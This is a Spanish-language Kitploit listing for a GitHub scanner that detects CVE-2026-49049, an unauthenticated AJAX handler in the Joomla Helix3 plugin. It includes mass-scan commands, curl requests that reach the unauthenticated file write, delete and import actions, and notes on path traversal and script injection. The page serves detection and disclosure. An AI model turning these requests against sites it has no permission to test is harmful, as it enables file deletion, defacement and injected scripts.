Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-49049 — Escáner de vulnerabilidades de solo lectura para CVE-2026-49049 — Plugin Helix3 de Joomla, manejador AJAX no autenticado | Kitploit
Herramientas/GitHubGitHub/shinthink/cve-2026-49049
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubshinthink/cve-2026-49049

CVE-2026-49049

Escáner de vulnerabilidades de solo lectura para CVE-2026-49049 — Plugin Helix3 de Joomla, manejador AJAX no autenticado

Ver Repositorio
4hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Python CVE CVSS License

CVE-2026-49049 — Plugin Helix3 de Joomla (JoomShaper)

Manejador AJAX no autenticado — Escáner de vulnerabilidad de solo lectura


Resumen

CVE-2026-49049 afecta al framework de plantillas Helix3 para Joomla (versiones 1.0 a 3.1.0). El manejador onAjaxHelix3, accesible a través del despachador com_ajax de Joomla, no realiza ninguna autenticación, autorización o validación CSRF en varias acciones destructivas:

Nota: La acción import se añadió en Helix3 v3.x. Los sitios que ejecutan v2.x solo se ven afectados por save y remove.

La vulnerabilidad fue descubierta por Phil Taylor (mySites.guru) y publicada el 29 de junio de 2026.

Versiones afectadas

Versión Helix3save/removeimport
1.0 – 2.xVulnerableNo presente
3.0 – 3.1.0VulnerableVulnerable
3.1.1+ParcheadoParcheado

Instalación

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

Uso

root@kitploit:~
# Objetivo único
python cve_2026_49049.py -t 192.168.1.100

# Escaneo masivo
python cve_2026_49049.py -f objetivos.txt -o resultados.txt

# Con informe JSON + modo verbose
python cve_2026_49049.py -f objetivos.txt --json reporte.json -v

Argumentos

root@kitploit:~
  -t, --target     Objetivo único (dominio o IP)
  -f, --file       Archivo con objetivos, uno por línea
  -o, --output     Salida de texto en tiempo real (predeterminado: cve-2026-49049_scan.txt)
  --json           Informe JSON estructurado (predeterminado: cve-2026-49049_report.json)
  --threads        Trabajadores concurrentes (predeterminado: 15)
  --timeout        Tiempo de espera HTTP en segundos (predeterminado: 15)
  -v, --verbose    Mostrar detalles de la sonda

Prueba de concepto

Detección y validación

El escáner realiza una sonda de solo lectura: escribe un archivo JSON inofensivo en la carpeta de diseño de Helix3 a través del endpoint save no autenticado, verifica que se haya escrito y luego lo elimina inmediatamente mediante el endpoint remove. No se dejan cambios persistentes en el objetivo.

root@kitploit:~
$ python cve_2026_49049.py -t 192.168.1.100 -v
root@kitploit:~
    CVE-2026-49049 — Helix3 (JoomShaper)
    Escáner de manejador AJAX no autenticado de Joomla

    [*] save   — accesible (sonda: 3a9719da)
    [*] remove — accesible (sonda limpiada)

  Host      : 192.168.1.100
  Estado    : vulnerable
  Helix3    : 2.5.6
  Vulnerable: SÍ
  save      : SÍ
  remove    : SÍ
  import    : NO
  Tiempo    : 2.0s

Reproducción manual

El escáner sondea estos mismos endpoints. Para verificación manual:

Paso 1 — Confirmar que Helix3 está instalado

root@kitploit:~
curl -sk 'https://objetivo.com/templates/shaper_helix3/templateDetails.xml'
# Busque <version>X.X.X</version>

Paso 2 — Probar acción save (escritura de archivo no autenticada)

root@kitploit:~
curl -sk -X POST \
  'https://objetivo.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_sonda&data[content]={"sonda":"test"}'

Paso 3 — Probar acción remove (eliminación de archivo no autenticada)

root@kitploit:~
curl -sk -X POST \
  'https://objetivo.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=remove&data[layoutName]=_test_sonda.json'

Paso 4 — Probar acción import (solo v3.x, no disponible en v2.x)

root@kitploit:~
curl -sk -X POST \
  'https://objetivo.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=import&data[template_id]=1&data[settings]={}'

# Nota: import se añadió en Helix3 v3.x.
# Los sitios que ejecutan v2.x devolverán una respuesta vacía para esta acción.

Mecanismo de la vulnerabilidad

En versiones de Helix3 anteriores a 3.1.1, plugins/ajax/helix3/helix3.php procesa las solicitudes a través de onAjaxHelix3() sin protecciones:

root@kitploit:~
public function onAjaxHelix3()
{
    $input = Factory::getApplication()->input;
    $data  = $input->post->get('data', [], 'array');
    $action = $data['action'];
    $layoutName = $data['layoutName'];

    // No hay comprobación de autenticación. No hay token CSRF. No hay validación de ruta.
    $filepath = $layoutPath . $layoutName;   // path traversal posible

    switch ($action) {
        case 'remove':
            unlink($filepath);               // eliminación de archivos arbitraria
            break;
        case 'save':
            fwrite(fopen($filepath . '.json', 'wb'), $data['content']);  // escritura
            break;
    }
}

Por qué es peligroso

  • Save + path traversal — layoutName=../../../ubicacion/maliciosa escribe archivos fuera del directorio de diseño previsto
  • Remove no tiene restricción de extensión — a diferencia de save (que añade .json), remove puede apuntar a cualquier tipo de archivo
  • Import (v3.x) sobrescribe parámetros de la base de datos — custom_js se renderiza sin escapar en la salida de la plantilla, permitiendo la inyección de script en cada página. Este es el vector utilizado en ataques de desfiguración reales.

Aviso legal

SOLO CON FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS.

Este software está destinado a profesionales de seguridad que realizan pruebas de penetración autorizadas, organizaciones que auditan su propia infraestructura e investigadores que estudian la explotación de vulnerabilidades.

El acceso no autorizado a sistemas informáticos es ilegal y puede violar:

  • Estados Unidos: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesia: UU ITE Pasal 30 & 46
  • Unión Europea: Directiva 2013/40/UE
  • Reino Unido: Computer Misuse Act 1990

Los autores no asumen ninguna responsabilidad por el uso indebido. Al utilizar este software, usted acepta toda la responsabilidad por sus acciones.


Referencias

RecursoEnlace

Este proyecto no está afiliado con JoomShaper, Joomla ni Open Source Matters, Inc.

Descargar herramienta
AcciónImpactoDisponible en
saveEscribe archivos JSON controlados por atacante con path traversalTodas las versiones
removeElimina archivos arbitrarios — sin restricción de extensión o rutaTodas las versiones
importSobrescribe parámetros de plantilla almacenados en la base de datossolo v3.x
Aviso original (mySites.guru)Helix3 3.1.1 Security Fix
Entrada NVDCVE-2026-49049
OpenCVECVE-2026-49049
GitHub de JoomShaperRepositorio Helix3